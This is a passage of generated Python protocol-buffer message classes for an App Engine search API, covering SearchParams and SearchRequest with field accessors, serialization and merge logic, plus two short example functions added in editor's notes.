_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.FacetRefinement'
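# Editor's note: illustrative sketch, not generated code. FacetRefinement
# narrows results by a facet: name is required, and either a literal value or
# a FacetRefinement_Range (via mutable_range()) may be supplied. Only
# accessors defined above are used; the facet name and bounds are
# hypothetical.
def _example_facet_refinement():
  """Refines on the 'price' facet to values between '10' and '50'."""
  refinement = FacetRefinement()
  refinement.set_name('price')
  refinement.mutable_range().set_start('10')
  refinement.mutable_range().set_end('50')
  assert refinement.IsInitialized()  # name, the only required field, is set
  return refinement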
class SearchParams(ProtocolBuffer.ProtocolMessage):
NONE = 0
SINGLE = 1
PER_RESULT = 2
_CursorType_NAMES = {
0: "NONE",
1: "SINGLE",
2: "PER_RESULT",
}
def CursorType_Name(cls, x): return cls._CursorType_NAMES.get(x, "")
CursorType_Name = classmethod(CursorType_Name)
STRICT = 0
RELAXED = 1
_ParsingMode_NAMES = {
0: "STRICT",
1: "RELAXED",
}
def ParsingMode_Name(cls, x): return cls._ParsingMode_NAMES.get(x, "")
ParsingMode_Name = classmethod(ParsingMode_Name)
has_index_spec_ = 0
has_query_ = 0
query_ = ""
has_cursor_ = 0
cursor_ = ""
has_offset_ = 0
offset_ = 0
has_cursor_type_ = 0
cursor_type_ = 0
has_limit_ = 0
limit_ = 20
has_matched_count_accuracy_ = 0
matched_count_accuracy_ = 0
has_scorer_spec_ = 0
scorer_spec_ = None
has_field_spec_ = 0
field_spec_ = None
has_keys_only_ = 0
keys_only_ = 0
has_parsing_mode_ = 0
parsing_mode_ = 0
has_auto_discover_facet_count_ = 0
auto_discover_facet_count_ = 0
has_facet_auto_detect_param_ = 0
facet_auto_detect_param_ = None
has_facet_depth_ = 0
facet_depth_ = 1000
def __init__(self, contents=None):
self.index_spec_ = IndexSpec()
self.sort_spec_ = []
self.include_facet_ = []
self.facet_refinement_ = []
self.lazy_init_lock_ = thread.allocate_lock()
if contents is not None: self.MergeFromString(contents)
def index_spec(self): return self.index_spec_
def mutable_index_spec(self): self.has_index_spec_ = 1; return self.index_spec_
def clear_index_spec(self):self.has_index_spec_ = 0; self.index_spec_.Clear()
def has_index_spec(self): return self.has_index_spec_
def query(self): return self.query_
def set_query(self, x):
self.has_query_ = 1
self.query_ = x
def clear_query(self):
if self.has_query_:
self.has_query_ = 0
self.query_ = ""
def has_query(self): return self.has_query_
def cursor(self): return self.cursor_
def set_cursor(self, x):
self.has_cursor_ = 1
self.cursor_ = x
def clear_cursor(self):
if self.has_cursor_:
self.has_cursor_ = 0
self.cursor_ = ""
def has_cursor(self): return self.has_cursor_
def offset(self): return self.offset_
def set_offset(self, x):
self.has_offset_ = 1
self.offset_ = x
def clear_offset(self):
if self.has_offset_:
self.has_offset_ = 0
self.offset_ = 0
def has_offset(self): return self.has_offset_
def cursor_type(self): return self.cursor_type_
def set_cursor_type(self, x):
self.has_cursor_type_ = 1
self.cursor_type_ = x
def clear_cursor_type(self):
if self.has_cursor_type_:
self.has_cursor_type_ = 0
self.cursor_type_ = 0
def has_cursor_type(self): return self.has_cursor_type_
def limit(self): return self.limit_
def set_limit(self, x):
self.has_limit_ = 1
self.limit_ = x
def clear_limit(self):
if self.has_limit_:
self.has_limit_ = 0
self.limit_ = 20
def has_limit(self): return self.has_limit_
def matched_count_accuracy(self): return self.matched_count_accuracy_
def set_matched_count_accuracy(self, x):
self.has_matched_count_accuracy_ = 1
self.matched_count_accuracy_ = x
def clear_matched_count_accuracy(self):
if self.has_matched_count_accuracy_:
self.has_matched_count_accuracy_ = 0
self.matched_count_accuracy_ = 0
def has_matched_count_accuracy(self): return self.has_matched_count_accuracy_
def sort_spec_size(self): return len(self.sort_spec_)
def sort_spec_list(self): return self.sort_spec_
def sort_spec(self, i):
return self.sort_spec_[i]
def mutable_sort_spec(self, i):
return self.sort_spec_[i]
def add_sort_spec(self):
x = SortSpec()
self.sort_spec_.append(x)
return x
def clear_sort_spec(self):
self.sort_spec_ = []
def scorer_spec(self):
if self.scorer_spec_ is None:
self.lazy_init_lock_.acquire()
try:
if self.scorer_spec_ is None: self.scorer_spec_ = ScorerSpec()
finally:
self.lazy_init_lock_.release()
return self.scorer_spec_
def mutable_scorer_spec(self): self.has_scorer_spec_ = 1; return self.scorer_spec()
def clear_scorer_spec(self):
if self.has_scorer_spec_:
self.has_scorer_spec_ = 0;
if self.scorer_spec_ is not None: self.scorer_spec_.Clear()
def has_scorer_spec(self): return self.has_scorer_spec_
def field_spec(self):
if self.field_spec_ is None:
self.lazy_init_lock_.acquire()
try:
if self.field_spec_ is None: self.field_spec_ = FieldSpec()
finally:
self.lazy_init_lock_.release()
return self.field_spec_
def mutable_field_spec(self): self.has_field_spec_ = 1; return self.field_spec()
def clear_field_spec(self):
if self.has_field_spec_:
self.has_field_spec_ = 0;
if self.field_spec_ is not None: self.field_spec_.Clear()
def has_field_spec(self): return self.has_field_spec_
def keys_only(self): return self.keys_only_
def set_keys_only(self, x):
self.has_keys_only_ = 1
self.keys_only_ = x
def clear_keys_only(self):
if self.has_keys_only_:
self.has_keys_only_ = 0
self.keys_only_ = 0
def has_keys_only(self): return self.has_keys_only_
def parsing_mode(self): return self.parsing_mode_
def set_parsing_mode(self, x):
self.has_parsing_mode_ = 1
self.parsing_mode_ = x
def clear_parsing_mode(self):
if self.has_parsing_mode_:
self.has_parsing_mode_ = 0
self.parsing_mode_ = 0
def has_parsing_mode(self): return self.has_parsing_mode_
def auto_discover_facet_count(self): return self.auto_discover_facet_count_
def set_auto_discover_facet_count(self, x):
self.has_auto_discover_facet_count_ = 1
self.auto_discover_facet_count_ = x
def clear_auto_discover_facet_count(self):
if self.has_auto_discover_facet_count_:
self.has_auto_discover_facet_count_ = 0
self.auto_discover_facet_count_ = 0
def has_auto_discover_facet_count(self): return self.has_auto_discover_facet_count_
def include_facet_size(self): return len(self.include_facet_)
def include_facet_list(self): return self.include_facet_
def include_facet(self, i):
return self.include_facet_[i]
def mutable_include_facet(self, i):
return self.include_facet_[i]
def add_include_facet(self):
x = FacetRequest()
self.include_facet_.append(x)
return x
def clear_include_facet(self):
self.include_facet_ = []
def facet_refinement_size(self): return len(self.facet_refinement_)
def facet_refinement_list(self): return self.facet_refinement_
def facet_refinement(self, i):
return self.facet_refinement_[i]
def mutable_facet_refinement(self, i):
return self.facet_refinement_[i]
def add_facet_refinement(self):
x = FacetRefinement()
self.facet_refinement_.append(x)
return x
def clear_facet_refinement(self):
self.facet_refinement_ = []
def facet_auto_detect_param(self):
if self.facet_auto_detect_param_ is None:
self.lazy_init_lock_.acquire()
try:
if self.facet_auto_detect_param_ is None: self.facet_auto_detect_param_ = FacetAutoDetectParam()
finally:
self.lazy_init_lock_.release()
return self.facet_auto_detect_param_
def mutable_facet_auto_detect_param(self): self.has_facet_auto_detect_param_ = 1; return self.facet_auto_detect_param()
def clear_facet_auto_detect_param(self):
if self.has_facet_auto_detect_param_:
self.has_facet_auto_detect_param_ = 0;
if self.facet_auto_detect_param_ is not None: self.facet_auto_detect_param_.Clear()
def has_facet_auto_detect_param(self): return self.has_facet_auto_detect_param_
def facet_depth(self): return self.facet_depth_
def set_facet_depth(self, x):
self.has_facet_depth_ = 1
self.facet_depth_ = x
def clear_facet_depth(self):
if self.has_facet_depth_:
self.has_facet_depth_ = 0
self.facet_depth_ = 1000
def has_facet_depth(self): return self.has_facet_depth_
def MergeFrom(self, x):
assert x is not self
if (x.has_index_spec()): self.mutable_index_spec().MergeFrom(x.index_spec())
if (x.has_query()): self.set_query(x.query())
if (x.has_cursor()): self.set_cursor(x.cursor())
if (x.has_offset()): self.set_offset(x.offset())
if (x.has_cursor_type()): self.set_cursor_type(x.cursor_type())
if (x.has_limit()): self.set_limit(x.limit())
if (x.has_matched_count_accuracy()): self.set_matched_count_accuracy(x.matched_count_accuracy())
for i in xrange(x.sort_spec_size()): self.add_sort_spec().CopyFrom(x.sort_spec(i))
if (x.has_scorer_spec()): self.mutable_scorer_spec().MergeFrom(x.scorer_spec())
if (x.has_field_spec()): self.mutable_field_spec().MergeFrom(x.field_spec())
if (x.has_keys_only()): self.set_keys_only(x.keys_only())
if (x.has_parsing_mode()): self.set_parsing_mode(x.parsing_mode())
if (x.has_auto_discover_facet_count()): self.set_auto_discover_facet_count(x.auto_discover_facet_count())
for i in xrange(x.include_facet_size()): self.add_include_facet().CopyFrom(x.include_facet(i))
for i in xrange(x.facet_refinement_size()): self.add_facet_refinement().CopyFrom(x.facet_refinement(i))
if (x.has_facet_auto_detect_param()): self.mutable_facet_auto_detect_param().MergeFrom(x.facet_auto_detect_param())
if (x.has_facet_depth()): self.set_facet_depth(x.facet_depth())
def Equals(self, x):
if x is self: return 1
if self.has_index_spec_ != x.has_index_spec_: return 0
if self.has_index_spec_ and self.index_spec_ != x.index_spec_: return 0
if self.has_query_ != x.has_query_: return 0
if self.has_query_ and self.query_ != x.query_: return 0
if self.has_cursor_ != x.has_cursor_: return 0
if self.has_cursor_ and self.cursor_ != x.cursor_: return 0
if self.has_offset_ != x.has_offset_: return 0
if self.has_offset_ and self.offset_ != x.offset_: return 0
if self.has_cursor_type_ != x.has_cursor_type_: return 0
if self.has_cursor_type_ and self.cursor_type_ != x.cursor_type_: return 0
if self.has_limit_ != x.has_limit_: return 0
if self.has_limit_ and self.limit_ != x.limit_: return 0
if self.has_matched_count_accuracy_ != x.has_matched_count_accuracy_: return 0
if self.has_matched_count_accuracy_ and self.matched_count_accuracy_ != x.matched_count_accuracy_: return 0
if len(self.sort_spec_) != len(x.sort_spec_): return 0
for e1, e2 in zip(self.sort_spec_, x.sort_spec_):
if e1 != e2: return 0
if self.has_scorer_spec_ != x.has_scorer_spec_: return 0
if self.has_scorer_spec_ and self.scorer_spec_ != x.scorer_spec_: return 0
if self.has_field_spec_ != x.has_field_spec_: return 0
if self.has_field_spec_ and self.field_spec_ != x.field_spec_: return 0
if self.has_keys_only_ != x.has_keys_only_: return 0
if self.has_keys_only_ and self.keys_only_ != x.keys_only_: return 0
if self.has_parsing_mode_ != x.has_parsing_mode_: return 0
if self.has_parsing_mode_ and self.parsing_mode_ != x.parsing_mode_: return 0
if self.has_auto_discover_facet_count_ != x.has_auto_discover_facet_count_: return 0
if self.has_auto_discover_facet_count_ and self.auto_discover_facet_count_ != x.auto_discover_facet_count_: return 0
if len(self.include_facet_) != len(x.include_facet_): return 0
for e1, e2 in zip(self.include_facet_, x.include_facet_):
if e1 != e2: return 0
if len(self.facet_refinement_) != len(x.facet_refinement_): return 0
for e1, e2 in zip(self.facet_refinement_, x.facet_refinement_):
if e1 != e2: return 0
if self.has_facet_auto_detect_param_ != x.has_facet_auto_detect_param_: return 0
if self.has_facet_auto_detect_param_ and self.facet_auto_detect_param_ != x.facet_auto_detect_param_: return 0
if self.has_facet_depth_ != x.has_facet_depth_: return 0
if self.has_facet_depth_ and self.facet_depth_ != x.facet_depth_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_index_spec_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: index_spec not set.')
elif not self.index_spec_.IsInitialized(debug_strs): initialized = 0
if (not self.has_query_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: query not set.')
for p in self.sort_spec_:
if not p.IsInitialized(debug_strs): initialized=0
if (self.has_scorer_spec_ and not self.scorer_spec_.IsInitialized(debug_strs)): initialized = 0
if (self.has_field_spec_ and not self.field_spec_.IsInitialized(debug_strs)): initialized = 0
for p in self.include_facet_:
if not p.IsInitialized(debug_strs): initialized=0
for p in self.facet_refinement_:
if not p.IsInitialized(debug_strs): initialized=0
if (self.has_facet_auto_detect_param_ and not self.facet_auto_detect_param_.IsInitialized(debug_strs)): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.index_spec_.ByteSize())
n += self.lengthString(len(self.query_))
if (self.has_cursor_): n += 1 + self.lengthString(len(self.cursor_))
if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
if (self.has_cursor_type_): n += 1 + self.lengthVarInt64(self.cursor_type_)
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
if (self.has_matched_count_accuracy_): n += 1 + self.lengthVarInt64(self.matched_count_accuracy_)
n += 1 * len(self.sort_spec_)
for i in xrange(len(self.sort_spec_)): n += self.lengthString(self.sort_spec_[i].ByteSize())
if (self.has_scorer_spec_): n += 1 + self.lengthString(self.scorer_spec_.ByteSize())
if (self.has_field_spec_): n += 1 + self.lengthString(self.field_spec_.ByteSize())
if (self.has_keys_only_): n += 2
if (self.has_parsing_mode_): n += 1 + self.lengthVarInt64(self.parsing_mode_)
if (self.has_auto_discover_facet_count_): n += 1 + self.lengthVarInt64(self.auto_discover_facet_count_)
n += 2 * len(self.include_facet_)
for i in xrange(len(self.include_facet_)): n += self.lengthString(self.include_facet_[i].ByteSize())
n += 2 * len(self.facet_refinement_)
for i in xrange(len(self.facet_refinement_)): n += self.lengthString(self.facet_refinement_[i].ByteSize())
if (self.has_facet_auto_detect_param_): n += 2 + self.lengthString(self.facet_auto_detect_param_.ByteSize())
if (self.has_facet_depth_): n += 2 + self.lengthVarInt64(self.facet_depth_)
return n + 2
def ByteSizePartial(self):
n = 0
if (self.has_index_spec_):
n += 1
n += self.lengthString(self.index_spec_.ByteSizePartial())
if (self.has_query_):
n += 1
n += self.lengthString(len(self.query_))
if (self.has_cursor_): n += 1 + self.lengthString(len(self.cursor_))
if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
if (self.has_cursor_type_): n += 1 + self.lengthVarInt64(self.cursor_type_)
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
if (self.has_matched_count_accuracy_): n += 1 + self.lengthVarInt64(self.matched_count_accuracy_)
n += 1 * len(self.sort_spec_)
for i in xrange(len(self.sort_spec_)): n += self.lengthString(self.sort_spec_[i].ByteSizePartial())
if (self.has_scorer_spec_): n += 1 + self.lengthString(self.scorer_spec_.ByteSizePartial())
if (self.has_field_spec_): n += 1 + self.lengthString(self.field_spec_.ByteSizePartial())
if (self.has_keys_only_): n += 2
if (self.has_parsing_mode_): n += 1 + self.lengthVarInt64(self.parsing_mode_)
if (self.has_auto_discover_facet_count_): n += 1 + self.lengthVarInt64(self.auto_discover_facet_count_)
n += 2 * len(self.include_facet_)
for i in xrange(len(self.include_facet_)): n += self.lengthString(self.include_facet_[i].ByteSizePartial())
n += 2 * len(self.facet_refinement_)
for i in xrange(len(self.facet_refinement_)): n += self.lengthString(self.facet_refinement_[i].ByteSizePartial())
if (self.has_facet_auto_detect_param_): n += 2 + self.lengthString(self.facet_auto_detect_param_.ByteSizePartial())
if (self.has_facet_depth_): n += 2 + self.lengthVarInt64(self.facet_depth_)
return n
def Clear(self):
self.clear_index_spec()
self.clear_query()
self.clear_cursor()
self.clear_offset()
self.clear_cursor_type()
self.clear_limit()
self.clear_matched_count_accuracy()
self.clear_sort_spec()
self.clear_scorer_spec()
self.clear_field_spec()
self.clear_keys_only()
self.clear_parsing_mode()
self.clear_auto_discover_facet_count()
self.clear_include_facet()
self.clear_facet_refinement()
self.clear_facet_auto_detect_param()
self.clear_facet_depth()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSize())
self.index_spec_.OutputUnchecked(out)
out.putVarInt32(18)
out.putPrefixedString(self.query_)
if (self.has_cursor_):
out.putVarInt32(34)
out.putPrefixedString(self.cursor_)
if (self.has_cursor_type_):
out.putVarInt32(40)
out.putVarInt32(self.cursor_type_)
if (self.has_limit_):
out.putVarInt32(48)
out.putVarInt32(self.limit_)
if (self.has_matched_count_accuracy_):
out.putVarInt32(56)
out.putVarInt32(self.matched_count_accuracy_)
for i in xrange(len(self.sort_spec_)):
out.putVarInt32(66)
out.putVarInt32(self.sort_spec_[i].ByteSize())
self.sort_spec_[i].OutputUnchecked(out)
if (self.has_scorer_spec_):
out.putVarInt32(74)
out.putVarInt32(self.scorer_spec_.ByteSize())
self.scorer_spec_.OutputUnchecked(out)
if (self.has_field_spec_):
out.putVarInt32(82)
out.putVarInt32(self.field_spec_.ByteSize())
self.field_spec_.OutputUnchecked(out)
if (self.has_offset_):
out.putVarInt32(88)
out.putVarInt32(self.offset_)
if (self.has_keys_only_):
out.putVarInt32(96)
out.putBoolean(self.keys_only_)
if (self.has_parsing_mode_):
out.putVarInt32(104)
out.putVarInt32(self.parsing_mode_)
if (self.has_auto_discover_facet_count_):
out.putVarInt32(120)
out.putVarInt32(self.auto_discover_facet_count_)
for i in xrange(len(self.include_facet_)):
out.putVarInt32(130)
out.putVarInt32(self.include_facet_[i].ByteSize())
self.include_facet_[i].OutputUnchecked(out)
for i in xrange(len(self.facet_refinement_)):
out.putVarInt32(138)
out.putVarInt32(self.facet_refinement_[i].ByteSize())
self.facet_refinement_[i].OutputUnchecked(out)
if (self.has_facet_auto_detect_param_):
out.putVarInt32(146)
out.putVarInt32(self.facet_auto_detect_param_.ByteSize())
self.facet_auto_detect_param_.OutputUnchecked(out)
if (self.has_facet_depth_):
out.putVarInt32(152)
out.putVarInt32(self.facet_depth_)
def OutputPartial(self, out):
if (self.has_index_spec_):
out.putVarInt32(10)
out.putVarInt32(self.index_spec_.ByteSizePartial())
self.index_spec_.OutputPartial(out)
if (self.has_query_):
out.putVarInt32(18)
out.putPrefixedString(self.query_)
if (self.has_cursor_):
out.putVarInt32(34)
out.putPrefixedString(self.cursor_)
if (self.has_cursor_type_):
out.putVarInt32(40)
out.putVarInt32(self.cursor_type_)
if (self.has_limit_):
out.putVarInt32(48)
out.putVarInt32(self.limit_)
if (self.has_matched_count_accuracy_):
out.putVarInt32(56)
out.putVarInt32(self.matched_count_accuracy_)
for i in xrange(len(self.sort_spec_)):
out.putVarInt32(66)
out.putVarInt32(self.sort_spec_[i].ByteSizePartial())
self.sort_spec_[i].OutputPartial(out)
if (self.has_scorer_spec_):
out.putVarInt32(74)
out.putVarInt32(self.scorer_spec_.ByteSizePartial())
self.scorer_spec_.OutputPartial(out)
if (self.has_field_spec_):
out.putVarInt32(82)
out.putVarInt32(self.field_spec_.ByteSizePartial())
self.field_spec_.OutputPartial(out)
if (self.has_offset_):
out.putVarInt32(88)
out.putVarInt32(self.offset_)
if (self.has_keys_only_):
out.putVarInt32(96)
out.putBoolean(self.keys_only_)
if (self.has_parsing_mode_):
out.putVarInt32(104)
out.putVarInt32(self.parsing_mode_)
if (self.has_auto_discover_facet_count_):
out.putVarInt32(120)
out.putVarInt32(self.auto_discover_facet_count_)
for i in xrange(len(self.include_facet_)):
out.putVarInt32(130)
out.putVarInt32(self.include_facet_[i].ByteSizePartial())
self.include_facet_[i].OutputPartial(out)
for i in xrange(len(self.facet_refinement_)):
out.putVarInt32(138)
out.putVarInt32(self.facet_refinement_[i].ByteSizePartial())
self.facet_refinement_[i].OutputPartial(out)
if (self.has_facet_auto_detect_param_):
out.putVarInt32(146)
out.putVarInt32(self.facet_auto_detect_param_.ByteSizePartial())
self.facet_auto_detect_param_.OutputPartial(out)
if (self.has_facet_depth_):
out.putVarInt32(152)
out.putVarInt32(self.facet_depth_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_index_spec().TryMerge(tmp)
continue
if tt == 18:
self.set_query(d.getPrefixedString())
continue
if tt == 34:
self.set_cursor(d.getPrefixedString())
continue
if tt == 40:
self.set_cursor_type(d.getVarInt32())
continue
if tt == 48:
self.set_limit(d.getVarInt32())
continue
if tt == 56:
self.set_matched_count_accuracy(d.getVarInt32())
continue
if tt == 66:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_sort_spec().TryMerge(tmp)
continue
if tt == 74:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_scorer_spec().TryMerge(tmp)
continue
if tt == 82:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_field_spec().TryMerge(tmp)
continue
if tt == 88:
self.set_offset(d.getVarInt32())
continue
if tt == 96:
self.set_keys_only(d.getBoolean())
continue
if tt == 104:
self.set_parsing_mode(d.getVarInt32())
continue
if tt == 120:
self.set_auto_discover_facet_count(d.getVarInt32())
continue
if tt == 130:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_include_facet().TryMerge(tmp)
continue
if tt == 138:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_facet_refinement().TryMerge(tmp)
continue
if tt == 146:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_facet_auto_detect_param().TryMerge(tmp)
continue
if tt == 152:
self.set_facet_depth(d.getVarInt32())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_index_spec_:
res+=prefix+"index_spec <\n"
res+=self.index_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_query_: res+=prefix+("query: %s\n" % self.DebugFormatString(self.query_))
if self.has_cursor_: res+=prefix+("cursor: %s\n" % self.DebugFormatString(self.cursor_))
if self.has_offset_: res+=prefix+("offset: %s\n" % self.DebugFormatInt32(self.offset_))
if self.has_cursor_type_: res+=prefix+("cursor_type: %s\n" % self.DebugFormatInt32(self.cursor_type_))
if self.has_limit_: res+=prefix+("limit: %s\n" % self.DebugFormatInt32(self.limit_))
if self.has_matched_count_accuracy_: res+=prefix+("matched_count_accuracy: %s\n" % self.DebugFormatInt32(self.matched_count_accuracy_))
cnt=0
for e in self.sort_spec_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("sort_spec%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_scorer_spec_:
res+=prefix+"scorer_spec <\n"
res+=self.scorer_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_field_spec_:
res+=prefix+"field_spec <\n"
res+=self.field_spec_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_keys_only_: res+=prefix+("keys_only: %s\n" % self.DebugFormatBool(self.keys_only_))
if self.has_parsing_mode_: res+=prefix+("parsing_mode: %s\n" % self.DebugFormatInt32(self.parsing_mode_))
if self.has_auto_discover_facet_count_: res+=prefix+("auto_discover_facet_count: %s\n" % self.DebugFormatInt32(self.auto_discover_facet_count_))
cnt=0
for e in self.include_facet_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("include_facet%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
cnt=0
for e in self.facet_refinement_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("facet_refinement%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_facet_auto_detect_param_:
res+=prefix+"facet_auto_detect_param <\n"
res+=self.facet_auto_detect_param_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_facet_depth_: res+=prefix+("facet_depth: %s\n" % self.DebugFormatInt32(self.facet_depth_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kindex_spec = 1
kquery = 2
kcursor = 4
koffset = 11
kcursor_type = 5
klimit = 6
kmatched_count_accuracy = 7
ksort_spec = 8
kscorer_spec = 9
kfield_spec = 10
kkeys_only = 12
kparsing_mode = 13
kauto_discover_facet_count = 15
kinclude_facet = 16
kfacet_refinement = 17
kfacet_auto_detect_param = 18
kfacet_depth = 19
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "index_spec",
2: "query",
4: "cursor",
5: "cursor_type",
6: "limit",
7: "matched_count_accuracy",
8: "sort_spec",
9: "scorer_spec",
10: "field_spec",
11: "offset",
12: "keys_only",
13: "parsing_mode",
15: "auto_discover_facet_count",
16: "include_facet",
17: "facet_refinement",
18: "facet_auto_detect_param",
19: "facet_depth",
}, 19)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.STRING,
5: ProtocolBuffer.Encoder.NUMERIC,
6: ProtocolBuffer.Encoder.NUMERIC,
7: ProtocolBuffer.Encoder.NUMERIC,
8: ProtocolBuffer.Encoder.STRING,
9: ProtocolBuffer.Encoder.STRING,
10: ProtocolBuffer.Encoder.STRING,
11: ProtocolBuffer.Encoder.NUMERIC,
12: ProtocolBuffer.Encoder.NUMERIC,
13: ProtocolBuffer.Encoder.NUMERIC,
15: ProtocolBuffer.Encoder.NUMERIC,
16: ProtocolBuffer.Encoder.STRING,
17: ProtocolBuffer.Encoder.STRING,
18: ProtocolBuffer.Encoder.STRING,
19: ProtocolBuffer.Encoder.NUMERIC,
}, 19, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.SearchParams'
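# Editor's note: illustrative sketch, not generated code. SearchParams is the
# core request message: index_spec and query are required, everything else
# (cursor, offset, limit, sort/scorer/field specs, facet options) is optional
# with the defaults shown above. set_name on IndexSpec is assumed from the
# IndexSpec message defined earlier in this module; the index name and query
# are hypothetical.
def _example_search_params():
  """Builds a minimal SearchParams querying 'python' against one index."""
  params = SearchParams()
  params.mutable_index_spec().set_name('products')
  params.set_query('python')
  params.set_limit(10)
  return params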
class SearchRequest(ProtocolBuffer.ProtocolMessage):
has_params_ = 0
has_app_id_ = 0
app_id_ = ""
def __init__(self, contents=None):
self.params_ = SearchParams()
if contents is not None: self.MergeFromString(contents)
def params(self): return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params_
def clear_params(self):self.has_params_ = 0; self.params_.Clear()
def has_params(self): return self.has_params_
def app_id(self): return self.app_id_
def set_app_id(self, x):
self.has_app_id_ = 1
self.app_id_ = x
def clear_app_id(self):
if self.has_app_id_:
self.has_app_id_ = 0
self.app_id_ = ""
def has_app_id(self): return self.has_app_id_
def MergeFrom(self, x):
assert x is not self
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
if (x.has_app_id()): self.set_app_id(x.app_id())
def Equals(self, x):
if x is self: return 1
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
if self.has_app_id_ != x.has_app_id_: return 0
if self.has_app_id_ and self.app_id_ != x.app_id_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_params_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: params not set.')
elif not self.params_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.params_.ByteSize())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_params_):
n += 1
n += self.lengthString(self.params_.ByteSizePartial())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n
def Clear(self):
self.clear_params()
self.clear_app_id()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def OutputPartial(self, out):
if (self.has_params_):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if tt == 26:
self.set_app_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_app_id_: res+=prefix+("app_id: %s\n" % self.DebugFormatString(self.app_id_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kparams = 1
kapp_id = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "params",
3: "app_id",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.SearchRequest'
class FacetResultValue(ProtocolBuffer.ProtocolMessage):
has_name_ = 0
name_ = ""
has_count_ = 0
count_ = 0
has_refinement_ = 0
